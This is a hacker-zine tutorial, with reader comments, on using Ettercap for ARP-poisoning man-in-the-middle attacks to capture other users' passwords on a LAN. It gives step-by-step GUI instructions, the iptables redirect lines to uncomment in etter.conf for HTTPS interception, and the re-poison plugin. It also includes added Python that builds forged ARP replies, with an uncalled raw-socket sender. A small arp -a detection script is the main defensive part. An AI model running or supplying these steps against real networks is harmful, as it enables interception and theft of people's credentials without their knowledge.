ARP Sniffing
By: Gamma Cpt R3v3r
ARP poisoning is defined at http://en.wikipedia.org/wiki/Arp_poisoning . I am not going to go into a definition of it; that is not the point of this article. Put simply, it means "spoofing" the gateway: the attacker answers for the gateway's IP address with its own MAC address, so every victim's ARP cache ends up binding the gateway IP to the attacker's MAC and the victim's traffic goes to the attacker first. (Changing your own MAC address is a related but separate trick; it can be done in several ways, for example with
ifconfig <interface> hw <class> <address> (the class is ether for Ethernet and Wi-Fi) or with the GNU MAC Changer.)
That is also not the point of this article. Well, technically it is, but what we are really going to do is use a GUI program called Ettercap. It is a free download for both Windows and Linux. Linux is much easier, though, since it is in most distributions' repositories. If you need to download it, go to http://ettercap.sourceforge.net/download.php
So we can start using it now. What we will be discussing is a MITM, or Man In The Middle, attack. A MITM attack does exactly what it sounds like: it places something in the middle of a connection that pretends to be one of the endpoints. On a LAN it can be used to reroute traffic so that everything, passwords included, passes through another computer before it reaches its destination. That is what I am going to focus on right now.
Ettercap makes this very simple. It is just one of the many things Ettercap does.
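To make the mechanism concrete before we click through the GUI, here is an added example (my own illustration, not ettercap's code and not part of the original article) that builds the forged ARP replies and decodes them the way a victim's ARP stack would. It shows the two-sided form ettercap actually uses, poisoning both the victim ("gateway is at attacker") and the gateway ("victim is at attacker"), which goes slightly beyond the one-sided "spoof the gateway" description above. All MAC and IP addresses are constructed. The send_frame helper is only there so the example is usable on Linux as root; nothing in the example calls it.

```python
"""Added example: forged ARP replies as used in ettercap-style poisoning.

The victim is told "gateway_ip is at attacker_mac"; the gateway is told
"victim_ip is at attacker_mac". Both then send through the attacker.
"""
import struct

ETH_P_ARP = 0x0806   # EtherType for ARP
ARP_REPLY = 2        # ARP opcode "reply"


def mac_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(x) for x in ip.split("."))


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Ethernet frame carrying the ARP reply 'sender_ip is at sender_mac'."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)   # SHA, SPA
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)   # THA, TPA
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode the fields a receiving ARP stack acts on (the SHA/SPA binding)."""
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    _htype, _ptype, _hlen, _plen, op = struct.unpack("!HHBBH", frame[14:22])
    sha, spa = frame[22:28], frame[28:32]
    tha, tpa = frame[32:38], frame[38:42]
    fmt_mac = lambda b: ":".join(f"{x:02x}" for x in b)
    fmt_ip = lambda b: ".".join(str(x) for x in b)
    return {"op": op,
            "sender_mac": fmt_mac(sha), "sender_ip": fmt_ip(spa),
            "target_mac": fmt_mac(tha), "target_ip": fmt_ip(tpa)}


def poison_frames(attacker_mac, gateway_ip, gateway_mac, victim_ip, victim_mac):
    """The pair of replies two-sided poisoning sends: one to each end."""
    to_victim = build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


def send_frame(iface: str, frame: bytes) -> None:
    """Linux only, needs root: put a raw frame on the wire. Not called here."""
    import socket
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


# Constructed sample addresses (assumptions, not from the article).
ATTACKER_MAC = "00:11:22:33:44:55"
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "aa:bb:cc:dd:ee:01"
VICTIM_IP, VICTIM_MAC = "192.168.1.50", "aa:bb:cc:dd:ee:50"

if __name__ == "__main__":
    for f in poison_frames(ATTACKER_MAC, GATEWAY_IP, GATEWAY_MAC, VICTIM_IP, VICTIM_MAC):
        print(parse_arp(f))
```

Decoding the first frame shows the whole trick in one line: sender_ip is the gateway's address but sender_mac is the attacker's, and that is the binding the victim's cache will keep until the real gateway answers an ARP request again (which is why the re-poison plugin matters later).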
So, lets dive in!!!
Start ettercap, obviously. Once you are in you need to make a few clicks. (We will also have to make two changes to a config file; more on this later.) Click on Options and select Promiscuous Mode.
Then click on Sniff, select Unified sniffing, and you will be prompted to choose your interface. I use wireless, so I would choose wlan0. Click OK. It might crash; that is fine, just restart it. Once you make it to the next screen, select Hosts and then Scan for hosts.
Click on Mitm, choose Arp poisoning, and make sure you tick Sniff remote connections. Then OK. With no hosts added to either target group, ettercap poisons every host it found, which makes this slightly easier. If you go to another computer on the network and run
arp -a
you will see two different IP addresses with the same MAC address: the gateway's IP and the attacker's IP both now map to the attacker's MAC. From then on, any time someone on the network logs into something that requires a username and password, you will be able to snag the username, the password and the URL they are sending them to (for clear-text protocols, at least; HTTPS needs the extra configuration below).
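As an added example (not from the article), here is a small check that automates what the arp -a step above shows from the victim's side: parse the table and report any MAC address bound to more than one IP, plus a yes/no answer for the gateway. The sample output is constructed in the Linux net-tools format; the parser also accepts the BSD/macOS layout.

```python
"""Added example: detect the symptom of ARP poisoning in 'arp -a' output,
i.e. one MAC address answering for more than one IP address."""
import re
from collections import defaultdict

# Constructed 'arp -a' output as a poisoned victim would see it (not real data).
SAMPLE_ARP_A = """\
gateway (192.168.1.1) at 00:11:22:33:44:55 [ether] on wlan0
? (192.168.1.50) at 00:11:22:33:44:55 [ether] on wlan0
printer (192.168.1.20) at aa:bb:cc:dd:ee:ff [ether] on wlan0
? (192.168.1.7) at <incomplete> on wlan0
"""

IP_RE = re.compile(r"\(?(\d{1,3}(?:\.\d{1,3}){3})\)?")
# Octets may be one hex digit on BSD/macOS ("0:1c:..."), two on Linux.
MAC_RE = re.compile(r"\b([0-9a-fA-F]{1,2}(?::[0-9a-fA-F]{1,2}){5})\b")


def parse_arp_table(text: str) -> dict:
    """Return {ip: mac} from 'arp -a' style lines; incomplete entries are skipped."""
    table = {}
    for line in text.splitlines():
        ip, mac = IP_RE.search(line), MAC_RE.search(line)
        if ip and mac:
            table[ip.group(1)] = mac.group(1).lower()
    return table


def find_shared_macs(table: dict) -> dict:
    """Return {mac: [ips]} for every MAC claimed by more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {m: sorted(ips) for m, ips in by_mac.items() if len(ips) > 1}


def gateway_is_suspect(table: dict, gateway_ip: str) -> bool:
    """True when the MAC recorded for the gateway is also answering for another IP."""
    return table.get(gateway_ip) in find_shared_macs(table)


if __name__ == "__main__":
    import sys
    text = SAMPLE_ARP_A if sys.stdin.isatty() else sys.stdin.read()
    for mac, ips in find_shared_macs(parse_arp_table(text)).items():
        print(f"{mac} claimed by {', '.join(ips)}")
```

Run it as `arp -a | python3 arpcheck.py` on the machine you suspect. A shared MAC is a signal, not proof: a router can legitimately answer for several addresses (proxy ARP), and ettercap can equally poison a host that never had the attacker's IP in its cache. The stronger check is to compare the gateway's current MAC against the value recorded when the network was known to be clean, which is what tools like arpwatch do.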
Like I said, there is a configuration change to make: uncomment the following two lines (remove the leading #) in etter.conf. They tell ettercap to redirect the ports it wants to intercept (SSL, for HTTPS) to itself through iptables, which is what makes the certificate warning described below possible. The file is at /usr/local/etc/etter.conf if you built from source (distribution packages put it at /etc/etter.conf or /etc/ettercap/etter.conf):
nano /usr/local/etc/etter.conf
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Also, if you were to start an SSH session to a host whose key you already have saved, you would get an error telling you that you may be the victim of a man-in-the-middle attack, because the host key presented no longer matches the saved one. You would then have to remove that host's entry from ~/.ssh/known_hosts, which will not be covered here. (The warning only appears if the handshake is actually tampered with; a session that is simply forwarded unchanged shows none.)
Ettercap has a good tool to keep re-poisoning the targets so their ARP caches do not recover. Click on Plugins and select repoison_arp. This is vital.
When someone tries to go to a page like Gmail, if you don't make the changes I described you will not get any info at all. If you do make them, you will get the info, but the person gets an invalid security certificate warning in their browser. I would be really worried about this, but according to recent studies and things I have done myself, people just click through it. Good thing for laziness. (One caveat: current browsers refuse to let the user click through on sites that use HSTS, and Gmail is one of them, so this part has aged.) Like I said, this is really simple. Little by little we will get into the more advanced attacks one can do.
FYI, if the network uses an advanced firewall policy like APF, you will lose your connection and be dropped from the network. APF does have the ability to block this type of attack.
Little by little more will be added to this tutorial. For now we are only focusing on getting usernames and passwords.
To be continued
This is the best zine EVER!! lol
sered secrets inside!!
excellent work.
Great article!
I'm currently working on a cryptography algorithm as well if anyone wants to have a look;
http://www.codeplex.com/Rexor